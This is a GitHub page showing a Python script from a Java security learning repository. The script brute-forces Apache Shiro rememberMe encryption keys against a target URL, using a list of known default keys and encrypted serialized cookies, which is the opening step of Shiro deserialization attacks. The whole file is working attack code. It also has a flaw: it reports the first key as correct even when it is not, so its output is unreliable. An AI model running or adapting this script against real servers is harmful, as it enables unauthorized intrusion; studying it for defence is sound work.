FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
JavaSecurityLearning/JavaSecurity/shirodemo/Dective.py at main · pbuff07/JavaSecurityLearning · GitHub
pbuff07
JavaSecurityLearning
Repository navigation
Code
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
JavaSecurityLearning
/
JavaSecurity
/
shirodemo
/
Dective.py
Copy path
More file actions
More file actions
Latest commit
History
History
History
47 lines (43 loc) · 2.16 KB
Breadcrumbs
JavaSecurityLearning
/
JavaSecurity
/
shirodemo
/
Dective.py
Copy path
File metadata and controls
47 lines (43 loc) · 2.16 KB
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import
base64
import
uuid
import
requests
from
Crypto
.
Cipher
import
AES
def
encrypt_AES_GCM
(
msg
,
secretKey
):
aesCipher
=
AES
.
new
(
secretKey
,
AES
.
MODE_GCM
)
ciphertext
,
authTag
=
aesCipher
.
encrypt_and_digest
(
msg
)
return
(
ciphertext
,
aesCipher
.
nonce
,
authTag
)
def
encode_rememberme
(
target
):
keys
=
[
'kPH+bIxk5D2deZiIxcaaaA=='
,
'4AvVhmFLUs0KTA3Kprsdag=='
,
'66v1O8keKNV3TTcGPK1wzg=='
,
'SDKOLKn2J1j/2BHjeZwAoQ=='
]
# 此处简单列举几个密钥
BS
=
AES
.
block_size
pad
=
lambda
s
:
s
+
((
BS
-
len
(
s
)
%
BS
)
*
chr
(
BS
-
len
(
s
)
%
BS
)).
encode
()
mode
=
AES
.
MODE_CBC
iv
=
uuid
.
uuid4
().
bytes
file_body
=
base64
.
b64decode
(
'rO0ABXNyADJvcmcuYXBhY2hlLnNoaXJvLnN1YmplY3QuU2ltcGxlUHJpbmNpcGFsQ29sbGVjdGlvbqh/WCXGowhKAwABTAAPcmVhbG1QcmluY2lwYWxzdAAPTGphdmEvdXRpbC9NYXA7eHBwdwEAeA=='
)
for
key
in
keys
:
try
:
# CBC加密
encryptor
=
AES
.
new
(
base64
.
b64decode
(
key
),
mode
,
iv
)
base64_ciphertext
=
base64
.
b64encode
(
iv
+
encryptor
.
encrypt
(
pad
(
file_body
)))
res
=
requests
.
get
(
target
,
cookies
=
{
'rememberMe'
:
base64_ciphertext
.
decode
()},
timeout
=
3
,
verify
=
False
,
allow_redirects
=
False
)
if
res
.
headers
.
get
(
"Set-Cookie"
)
==
None
:
print
(
"正确KEY :"
+
key
)
return
key
else
:
if
'rememberMe=deleteMe;'
not
in
res
.
headers
.
get
(
"Set-Cookie"
):
print
(
"正确key:"
+
key
)
return
key
# GCM加密
encryptedMsg
=
encrypt_AES_GCM
(
file_body
,
base64
.
b64decode
(
key
))
base64_ciphertext
=
base64
.
b64encode
(
encryptedMsg
[
1
]
+
encryptedMsg
[
0
]
+
encryptedMsg
[
2
])
res
=
requests
.
get
(
target
,
cookies
=
{
'rememberMe'
:
base64_ciphertext
.
decode
()},
timeout
=
3
,
verify
=
False
,
allow_redirects
=
False
)
if
res
.
headers
.
get
(
"Set-Cookie"
)
==
None
:
print
(
"正确KEY:"
+
key
)
return
key
else
:
if
'rememberMe=deleteMe;'
not
in
res
.
headers
.
get
(
"Set-Cookie"
):
print
(
"正确key:"
+
key
)
return
key
print
(
"正确key:"
+
key
)
return
key
except
Exception
as
e
:
print
(
e
)
Back
|
FazBrowse Home
|
New Git URL